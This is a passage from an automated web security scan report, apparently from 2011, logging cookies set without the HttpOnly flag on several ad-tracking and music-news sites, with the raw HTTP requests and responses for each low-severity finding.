HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:16 GMT
Server: Apache
Set-Cookie: ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99XL38TFyZ8vyXR/UGUrAmz8RGD8FvPWnsA==; Domain=s.clickability.com; Expires=Sat, 27-May-2079 17:13:23 GMT; Path=/
Set-Cookie: JSESSIONID=982F79AAACC14088C889EF85F0EE5B75.stats0x; Path=/
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r2-u7-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=826803210.20480.0000; path=/

GIF89a.............!.......,........@..D.;
10.6. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850969&migRandom=143243442&migTagDesc=Cingular&migAtlSA=286738722&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B411066b5f02ce7a6%253B12fd50ec8f3%2C0%253B%253B%253B2504330642%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAA88gO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQCvugEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496061384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 14:00:16 GMT; domain=.mookie1.com
Set-Cookie: session=1304949616|1304949616; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
10.7. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
10.8. http://www.nme.com/news/sufjan-stevens/56527  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
10.9. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2931142961646634775 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; s=1,2*4dab79ba*48Tp2my9Nk*5pS60fYTxp8svLzyNVfDVhLzEw==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*UMOtU6T9f3*5oBTqxB3t3jlHiD_vqydkrPvYQ==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
10.10. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:02 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2819581112640559492&fpid=12&nu=n&t
...[SNIP]...
10.11. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60&section=1384085
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 